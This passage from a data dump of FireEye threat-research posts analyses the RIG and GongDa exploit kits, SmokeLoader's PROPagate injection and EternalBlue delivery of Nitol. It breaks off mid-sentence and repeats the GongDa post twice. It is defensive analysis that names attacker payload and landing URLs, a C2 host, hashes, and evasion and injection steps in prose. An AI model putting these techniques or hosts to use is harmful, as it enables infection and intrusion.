iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig2.png) \nFigure 2: Injected iframe\n\nThe landing page contains three different JavaScripts snippets, each of which uses a different technique to deliver the payload. Each of these are not new techniques, so we will only be giving a brief overview of each one in this post.\n\n#### JavaScript 1\n\nThe first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig3.png) \nFigure 3: JavaScript 1 code snippet\n\nThe VBScript exploits [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) which allows it to download the payload and execute it using the code snippet seen in Figure 4.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig4.png) \nFigure 4: VBScript code snippet\n\n#### JavaScript 2\n\nThe second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig5.png) \nFigure 5: JavaScript 2 code snippet\n\nThis newly appended JavaScript exploits [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig6.png) \nFigure 6: Obfuscation using variables\n\nUsing these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig7.png) \nFigure 7: Call to JSON.Stringify\n\n#### JavaScript 3\n\nThe third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits [CVE-2018-4878](<https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html>), as shown in Figure 8.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig8.png) \nFigure 8: JavaScript 3 code snippet\n\nOnce the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig9.png) \nFigure 9: WScript command line\n\nThis JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig10.png) \nFigure 10: Malicious command line\n\n#### Payload Analysis\n\nFor this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig11a.png) \nFigure 11: Malware activity flow chart\n\n#### Analysis of NSIS Loader (SmokeLoader)\n\nThe first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named \u2018kumar.dll\u2019 and \u2018abaram.dat\u2019 in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).\n\nThe DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.\n\n#### Analysis of Injected Code (Second Stage Payload)\n\nThe second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.\n\nAt the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also contains code that checks whether the executable is in debugged mode, which it extracts from offset 0x2 of the PEB. If the _BeingDebugged_ flag is set, the executable terminates itself.\n\nThe malware also implements an Anti-VM check by opening the registry key **HKLM\\SYSTEM\\ControlSet001\\Services\\Disk\\Enum** with value 0.\n\nIt checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen. Each of these strings is indictative of virtual machines\n\nAfter running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.\n\nThe malware uses the [PROPagate injection method](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.\n\nThis code injection technique only works for a process with lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig12.png) \nFigure 12: Checking integrity level of current process\n\nIf the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.\n\nThe malware creates a file mapping object and writes the dropper file path to it and the same mapping object is accessed by injected code, to read the dropper file path and delete the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and a XOR operation with the hardcoded value (Figure 13).\n\n_File Mapping Object Name = \u201cVolume Serial Number\u201d + \u201cVolume Serial Number\u201d XOR 0x7E766791_\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig13.png) \nFigure 13: Creating file mapping object name\n\nThe malware then decrypts the third stage payload using XOR and decompresses it with RTLDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of decrypted data, we can get the proper executable header (Figure 14).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig14.png) \nFigure 14: Injected executable without header (left), and with header (right)\n\nAfter decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window\u2019s thread ID (Figure 15).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig15.png) \nFigure 15: Getting shell window thread ID\n\nThe malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.\n\nAfter injecting the payload into the target process, it uses EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares it with UxSubclassInfo\n\nAfter finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.\n\nSetPropA has three arguments, the third of which is data. The callback procedure address is stored at the offset 0x14 from the beginning of data. Malware modifies the callback address with the injected shellcode address (Figure 16).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig16.png) \nFigure 16: Modifying callback function\n\nThe malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.\n\nThe shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig17.png) \nFigure 17: Assembly view of injected shellcode\n\n#### Analysis of Third Stage Payload\n\nBefore executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.\n\nThe first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.\n\nThe second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.\n\nOther than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.\n\nTo remain persistent in the system, the malware installs a scheduled task and a shortcut file in %startup% folder. The scheduled task is named \u201cOpera Scheduled Autoupdate {Decimal Value of GetTickCount()}\u201d.\n\nThe malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates a MD5 hash value using Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig18.png) \nFigure 18: Network communication\n\nThe malware then downloads the final payload, the Monero miner, from the server and installs it in the system.\n\n#### Conclusion\n\nAlthough we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.\n\nFireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.\n\n#### Acknowledgement\n\nWe would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.\n", "edition": 2, "cvss3": {}, "published": "2018-06-28T12:00:00", "type": "fireeye", "title": "RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8174", "CVE-2018-4878", "CVE-2016-0189", "CVE-2015-2419"], "modified": "2018-06-28T12:00:00", "id": "FIREEYE:622FA05F62A3EDD3379557F635579EFB", "href": "https://www.fireeye.com/blog/threat-research/2018/06/rig-ek-delivering-monero-miner-via-propagate-injection-technique.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:54", "description": "On Jan. 27, we observed visitors to a Korean news site being redirected to the GongDa Exploit Kit (EK), potentially exposing them to malware infection. We will be referring to this site as KNS.\n\nGongDa is an exploit kit that can compromise vulnerable endpoints by use of exploits, allowing harmful malware to be installed on the system. While GongDa is an older exploit kit that continues to use Java exploits, it has also been found delivering both Flash and VBScript exploits as well. Despite its shortcomings when compared to newer EK\u2019s such as Angler or Neutrino, GongDa proves that old tricks (or vulnerabilities) can still work effectively.\n\n##### **ATTACK CHAIN**\n\nThe attack chain is no different than previous GongDa attacks we\u2019ve seen in the past. A compromised page on the site loads a .js file that redirects to the EK\u2019s landing page.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure1.png)Figure 1: GongDa EK attack chain\n\nWhere the initial page is at the first highlighted request shown in Figure 1. The second request is the .js file jquery-1.3.2.min.js. It has script code injected at the bottom that loads an iframe to **sekielec[.]co[.]kr/m/et/ad.html**, the EK\u2019s landing page as shown in Figure 2.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure2.png)Figure 2: Injected script in the .js leading to GongDa\n\nWe observed a number of KNS owned pages loading the malicious .js redirecting to the GongDa landing page \u201c/ad.html\u201d.\n\nFrom here, \u201cad.html\u201d loaded:\n\nsekielec.co.kr/m/et/swfobject.js** \nsekielec.co.kr/m/et/PnNxKk.html** \nsekielec.co.kr/m/et/jquery.js\n\n**EXPLOITS**\n\nGongDa has been observed serving the following CVE exploits in recent attacks:\n\n2011-3544, 2011-2140, 2012-0507, 2012-1723, 2012-1889, \n2012-4681, 2012-5076, 2013-0422, 2013-0634 and 2014-6332.\n\nIn this particular attack, the landing page probes the target machine and selects an exploit page to deliver to the victim. The exploit page observed in this attack was** sekielec.co.kr/m/et/PnNxKk.html. **It** **attempts to trigger CVE-2014-6332, \u201cWindows OLE Automation Array Remote Code Execution Vulnerability\u201d. This is a vulnerability that was patched by Microsoft Security Bulletin [MS14-064](<https://technet.microsoft.com/library/security/ms14-064>) in November of 2014. It is a commonly used and dangerous vulnerability that can give an attacker arbitrary command execution on a target system.\n\nThe exploit page begins by reversing a string of script code used to start the exploitation process.\n\nFigure 3 shows the before:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure3.PNG)\n\nFigure 3: Reversed initiation code\n\nAnd Figure 4 shows the after:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure4.PNG)Figure 4: Initiation code\n\nA call to the _Create()_ function leads to a function call to the trigger function _Over()_,_ _which is shown in Figure 5.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure5.png) \nFigure 5: Trigger function _Over()_\n\nThe _Over()_ function is responsible for setting up conditions and corrupting an OLE Automation array object, thus triggering the vulnerability.\n\nOnce the vulnerability is triggered, the attacker code can execute commands on the system.\n\nThree variables are assigned, as shown in Figure 6.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure6.PNG) \nFigure 6: Command variables\n\nThe first variable (_nburl_) is a URL to the attacker malware. The second variable (_nbExE_) is a randomly generated name for the malware that is placed on the system. The third variable (_nbnurl_) is simply the first variable enclosed in quotes.\n\n_nburl: http://smsforu.co.kr/RAD/stat/at.exe_\n\nFinally, the attacker code uses these variables and executes the following commands, as shown in Figure 7.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure7.PNG)Figure 7: Command beginning\n\nThe _nbnurl_ and the _nbExE_ variable are used in the execution of the commands shown in Figure 8.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure8.PNG)Figure 8: Command ending\n\nThe malicious file is placed in the \u201c%SystemRoot%\\system\\\u201d directory using the nbExE variable described above as a filename.\n\n##### **PAYLOADS**\n\nDuring this GongDa attack we saw the payloads being served from a domain within Korea:\n\n**smsforu[.]co[.]kr**\n\nWith the following filename:\n\n**/rad/stat/at.exe**\n\nIn recent GongDa attacks, we\u2019ve observed payloads such as backdoors, RATs, Trojans, and downloaders.\n\nSome of the MD5\u2019s observed include the following:\n\n * aac178f775588ca1d42c00d4d95604bd\n * 3d58f4b2008f6d87cab9166c09e513b5\n * a18d1bce5618b23f592dae9133c25229\n * 40be7c9424c6c6de0d560d358a020a5c\n * 808e27fd120ade3ecfb2b21aeda8bc58\n * ed751ce651d685100e00ed133e4e5018\n\n##### **ADDITIONAL INFO**\n\nAttacks involving the GongDa Exploit Kit are not new and are fairly common in the APAC region. While it\u2019s not the most cutting edge EK in the wild, it is still effective because many systems in the region seem to remain unpatched and defenseless against antiquated vulnerabilities such as those used by GongDa.\n\nAdditionally, GongDa consistently leverages infrastructure hosted on one of China\u2019s largest ISP\u2019s, China Telecom, operators of AS4134. China Telecom hosts the domain 51yes[.]com, a web traffic statistics service.\n\nOne of GongDa\u2019s telltale behaviors is the use of stat counters, presumably for tracking the EK\u2019s traffic and infection statistics. In this case they most always come from count_X_[.]51yes[.]com, based out of China. Figure 9 shows the GET requests for these stat counters.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure9.png) \nFigure 9: Stat counter request\n\nFireEye\u2019s Dynamic Threat Intelligence shows that count7[.]51yes[.].com has been used in multiple GongDa EK attacks in January 2016 alone.\n\n**Referering GongDa URL** \n \n--- \n \nbose.co.kr/shop/img/click/ad1.html\n\nbose.co.kr/shop/img/click/as1.html\n\nbose.co.kr/shop/img/naver/ad.html \n \nedresearch.co.kr/PEG/click/ad.html\n\nedresearch.co.kr/PEG/click1/ad.html \n \nnstory.com/tmp/click/ad1.html\n\nnstory.com/vars/ad/ad1.html\n\nnstory.com/vars/cache/click/ad1.html \n \nodbike.co.kr/w3c/cdn/ad1.html\n\nodbike.co.kr/shop/skin/click/ad1.html\n\nodbike.co.kr/shop/temp/click/ad1.html\n\nodbike.co.kr/w3c/cdn/ad1.html \n \npoption.kr/gnu/cdn1/ad.html\n\npoption.kr/gnu/click/ad.html\n\npoption.kr/gnu/extend/ad/ad.html\n\npoption.kr/w3c/click/ad.html \n \nsekielec.co.kr/m/et/ad.html \n \nsmsmaster.co.kr/docs/click1/ad.html\n\nsmsmaster.co.kr/docs/click3/ad.html \n \nwww.poption.kr/gnu/js/click/ad.html \n \nChecking other count_X_[.]51yes[.]com hits with GongDa referrer\u2019s, we saw hundreds of domains affected by the GongDa EK activity.\n\nIt is believed that the GongDa Exploit Kit has Chinese origins. The hypothesis is derived from capabilities, usage, and the infrastructure used to target various APAC region entities.\n\nInterestingly, the registrant for the sekielec.co[.]kr GongDa landing page domain, \u201crhhan AT sekihe.co[.]kr\u201d, also registered a number of other domains that have been observed as being GongDa landing pages as well.\n\n##### **CONCLUSION**\n\nWith a name reminiscent of a creature straight out of [Monster Island](<https://en.wikipedia.org/wiki/Monsterland_and_Monster_Island>), GongDa may not be the new kid on the block; however, as demonstrated, it is still active and capable of wreaking havoc. Network defenders in the APAC region should be aware of this EK and take steps to ensure this \u201cmonster\u201d never enters their network.\n\n##### **ACKNOWLEDGEMENTS**\n\nThe authors and FireEye Labs would like to thank Dan Perez for his contribution to this blog.\n", "cvss3": {}, "published": "2016-03-18T12:30:00", "type": "fireeye", "title": "GongDa vs. Korean News", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2016-03-18T12:30:00", "id": "FIREEYE:5D24D2858B8BB9D354FB42C4E22B5DD7", "href": "https://www.fireeye.com/blog/threat-research/2016/03/gongda_vs_koreanne.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:19", "description": "On Jan. 27, we observed visitors to a Korean news site being redirected to the GongDa Exploit Kit (EK), potentially exposing them to malware infection. We will be referring to this site as KNS.\n\nGongDa is an exploit kit that can compromise vulnerable endpoints by use of exploits, allowing harmful malware to be installed on the system. While GongDa is an older exploit kit that continues to use Java exploits, it has also been found delivering both Flash and VBScript exploits as well. Despite its shortcomings when compared to newer EK\u2019s such as Angler or Neutrino, GongDa proves that old tricks (or vulnerabilities) can still work effectively.\n\n##### **ATTACK CHAIN**\n\nThe attack chain is no different than previous GongDa attacks we\u2019ve seen in the past. A compromised page on the site loads a .js file that redirects to the EK\u2019s landing page.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure1.png)Figure 1: GongDa EK attack chain\n\nWhere the initial page is at the first highlighted request shown in Figure 1. The second request is the .js file jquery-1.3.2.min.js. It has script code injected at the bottom that loads an iframe to **sekielec[.]co[.]kr/m/et/ad.html**, the EK\u2019s landing page as shown in Figure 2.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure2.png)Figure 2: Injected script in the .js leading to GongDa\n\nWe observed a number of KNS owned pages loading the malicious .js redirecting to the GongDa landing page \u201c/ad.html\u201d.\n\nFrom here, \u201cad.html\u201d loaded:\n\nsekielec.co.kr/m/et/swfobject.js** \nsekielec.co.kr/m/et/PnNxKk.html** \nsekielec.co.kr/m/et/jquery.js\n\n**EXPLOITS**\n\nGongDa has been observed serving the following CVE exploits in recent attacks:\n\n2011-3544, 2011-2140, 2012-0507, 2012-1723, 2012-1889, \n2012-4681, 2012-5076, 2013-0422, 2013-0634 and 2014-6332.\n\nIn this particular attack, the landing page probes the target machine and selects an exploit page to deliver to the victim. The exploit page observed in this attack was** sekielec.co.kr/m/et/PnNxKk.html. **It** **attempts to trigger CVE-2014-6332, \u201cWindows OLE Automation Array Remote Code Execution Vulnerability\u201d. This is a vulnerability that was patched by Microsoft Security Bulletin [MS14-064](<https://technet.microsoft.com/library/security/ms14-064>) in November of 2014. It is a commonly used and dangerous vulnerability that can give an attacker arbitrary command execution on a target system.\n\nThe exploit page begins by reversing a string of script code used to start the exploitation process.\n\nFigure 3 shows the before:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure3.PNG)\n\nFigure 3: Reversed initiation code\n\nAnd Figure 4 shows the after:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure4.PNG)Figure 4: Initiation code\n\nA call to the _Create()_ function leads to a function call to the trigger function _Over()_,_ _which is shown in Figure 5.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure5.png) \nFigure 5: Trigger function _Over()_\n\nThe _Over()_ function is responsible for setting up conditions and corrupting an OLE Automation array object, thus triggering the vulnerability.\n\nOnce the vulnerability is triggered, the attacker code can execute commands on the system.\n\nThree variables are assigned, as shown in Figure 6.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure6.PNG) \nFigure 6: Command variables\n\nThe first variable (_nburl_) is a URL to the attacker malware. The second variable (_nbExE_) is a randomly generated name for the malware that is placed on the system. The third variable (_nbnurl_) is simply the first variable enclosed in quotes.\n\n_nburl: http://smsforu.co.kr/RAD/stat/at.exe_\n\nFinally, the attacker code uses these variables and executes the following commands, as shown in Figure 7.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure7.PNG)Figure 7: Command beginning\n\nThe _nbnurl_ and the _nbExE_ variable are used in the execution of the commands shown in Figure 8.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure8.PNG)Figure 8: Command ending\n\nThe malicious file is placed in the \u201c%SystemRoot%\\system\\\u201d directory using the nbExE variable described above as a filename.\n\n##### **PAYLOADS**\n\nDuring this GongDa attack we saw the payloads being served from a domain within Korea:\n\n**smsforu[.]co[.]kr**\n\nWith the following filename:\n\n**/rad/stat/at.exe**\n\nIn recent GongDa attacks, we\u2019ve observed payloads such as backdoors, RATs, Trojans, and downloaders.\n\nSome of the MD5\u2019s observed include the following:\n\n * aac178f775588ca1d42c00d4d95604bd\n * 3d58f4b2008f6d87cab9166c09e513b5\n * a18d1bce5618b23f592dae9133c25229\n * 40be7c9424c6c6de0d560d358a020a5c\n * 808e27fd120ade3ecfb2b21aeda8bc58\n * ed751ce651d685100e00ed133e4e5018\n\n##### **ADDITIONAL INFO**\n\nAttacks involving the GongDa Exploit Kit are not new and are fairly common in the APAC region. While it\u2019s not the most cutting edge EK in the wild, it is still effective because many systems in the region seem to remain unpatched and defenseless against antiquated vulnerabilities such as those used by GongDa.\n\nAdditionally, GongDa consistently leverages infrastructure hosted on one of China\u2019s largest ISP\u2019s, China Telecom, operators of AS4134. China Telecom hosts the domain 51yes[.]com, a web traffic statistics service.\n\nOne of GongDa\u2019s telltale behaviors is the use of stat counters, presumably for tracking the EK\u2019s traffic and infection statistics. In this case they most always come from count_X_[.]51yes[.]com, based out of China. Figure 9 shows the GET requests for these stat counters.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/GongDa/figure9.png) \nFigure 9: Stat counter request\n\nFireEye\u2019s Dynamic Threat Intelligence shows that count7[.]51yes[.].com has been used in multiple GongDa EK attacks in January 2016 alone.\n\n**Referering GongDa URL** \n \n--- \n \nbose.co.kr/shop/img/click/ad1.html\n\nbose.co.kr/shop/img/click/as1.html\n\nbose.co.kr/shop/img/naver/ad.html \n \nedresearch.co.kr/PEG/click/ad.html\n\nedresearch.co.kr/PEG/click1/ad.html \n \nnstory.com/tmp/click/ad1.html\n\nnstory.com/vars/ad/ad1.html\n\nnstory.com/vars/cache/click/ad1.html \n \nodbike.co.kr/w3c/cdn/ad1.html\n\nodbike.co.kr/shop/skin/click/ad1.html\n\nodbike.co.kr/shop/temp/click/ad1.html\n\nodbike.co.kr/w3c/cdn/ad1.html \n \npoption.kr/gnu/cdn1/ad.html\n\npoption.kr/gnu/click/ad.html\n\npoption.kr/gnu/extend/ad/ad.html\n\npoption.kr/w3c/click/ad.html \n \nsekielec.co.kr/m/et/ad.html \n \nsmsmaster.co.kr/docs/click1/ad.html\n\nsmsmaster.co.kr/docs/click3/ad.html \n \nwww.poption.kr/gnu/js/click/ad.html \n \nChecking other count_X_[.]51yes[.]com hits with GongDa referrer\u2019s, we saw hundreds of domains affected by the GongDa EK activity.\n\nIt is believed that the GongDa Exploit Kit has Chinese origins. The hypothesis is derived from capabilities, usage, and the infrastructure used to target various APAC region entities.\n\nInterestingly, the registrant for the sekielec.co[.]kr GongDa landing page domain, \u201crhhan AT sekihe.co[.]kr\u201d, also registered a number of other domains that have been observed as being GongDa landing pages as well.\n\n##### **CONCLUSION**\n\nWith a name reminiscent of a creature straight out of [Monster Island](<https://en.wikipedia.org/wiki/Monsterland_and_Monster_Island>), GongDa may not be the new kid on the block; however, as demonstrated, it is still active and capable of wreaking havoc. Network defenders in the APAC region should be aware of this EK and take steps to ensure this \u201cmonster\u201d never enters their network.\n\n##### **ACKNOWLEDGEMENTS**\n\nThe authors and FireEye Labs would like to thank Dan Perez for his contribution to this blog.\n", "edition": 2, "cvss3": {}, "published": "2016-03-18T08:30:00", "type": "fireeye", "title": "GongDa vs. Korean News", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2016-03-18T08:30:00", "id": "FIREEYE:8219EF8C20E41CCEB361F61E7498E804", "href": "https://www.fireeye.com/blog/threat-research/2016/03/gongda_vs_koreanne.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-28T01:17:12", "description": "The \u201cEternalBlue\u201d exploit ([MS017-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) was initially used by WannaCry ransomware and Adylkuzz cryptocurrency miner. Now more threat actors are leveraging the vulnerability in [Microsoft Server Message Block (SMB) protocol](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) \u2013 this time to distribute Backdoor.Nitol and Trojan Gh0st RAT.\n\nFireEye Dynamic Threat Intelligence (DTI) has historically observed similar payloads delivered via exploitation of CVE-2014-6332 vulnerability as well as in some email spam campaigns using [powershell commands](<https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html>). Specifically, Backdoor.Nitol has also been linked to campaigns involving a remote code execution vulnerability using the ADODB.Stream ActiveX Object that affects older versions of Internet Explorer. Both payloads have previously been involved in targeted [cyber-attacks against the aerospace and defense industry](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-aerospace.pdf>).\n\nWe observed lab machines vulnerable to SMB exploit were attacked by a threat actor using the EternalBlue exploit to gain shell access to the machine.\n\nFigure 1 shows an EternalBlue exploitation attempt.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image1.png)\n\nFigure 1. Network traffic showing EternalBlue attack attempt\n\nThe initial exploit technique used at the [SMB level](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) is similar to what we have been seen in [WannaCry campaigns](<https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html>); however, once a machine is successfully infected, this particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload on another server.\n\nWe have observed the same EternalBlue and VBScript combination used to distribute Gh0st RAT in Singapore, as well as Backdoor.Nitol being delivered in the South Asia region.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image2.jpg)\n\nFigure 2. VBScript instructions in \u20181.vbs\u2019\n\nThe full VBScript instructions can be seen in Figure 2. The attacker echoes instructions into a new \u20181.vbs\u2019 file to be executed later. These instructions fetch the payload \u2018taskmgr.exe\u2019 from another server in a synchronous call (as indicated by the second parameter \u20180\u2019). This action creates an ActiveX object ADODB.Stream, which allows reading the file coming from the server and writes the result of the binary data in a stream. Mode \u20183\u2019 is used for read/write permissions while type \u20181\u2019 indicates stream as binary data. Thereafter, it saves the binary stream to a location at \u201cc:/\u201d with option \u20182\u2019 in order to overwrite any binary with the same name at that location.\n\nLater, we see that \u20181.vbs\u2019 executes through a command-line version of the Windows Script Host which deletes the vbs file. Once the executable is fetched and saved, the attacker uses a shell to launch the backdoor from the saved location.\n\nFigure 3 shows Backdoor.Nitol being downloaded and infecting the machine.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image3.jpg)\n\nFigure 3. Network traffic showing Backdoor.Nitol download\n\nThe command and control (C2) for the Backdoor.Nitol sample is hackqz.f3322[.]org (120.209.40.157). See Figure 4.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image4.png)\n\nFigure 4. Backdoor.Nitol C2 communication\n\nThe other malware that we\u2019ve observed being deployed in this manner is Gh0st RAT. The observed 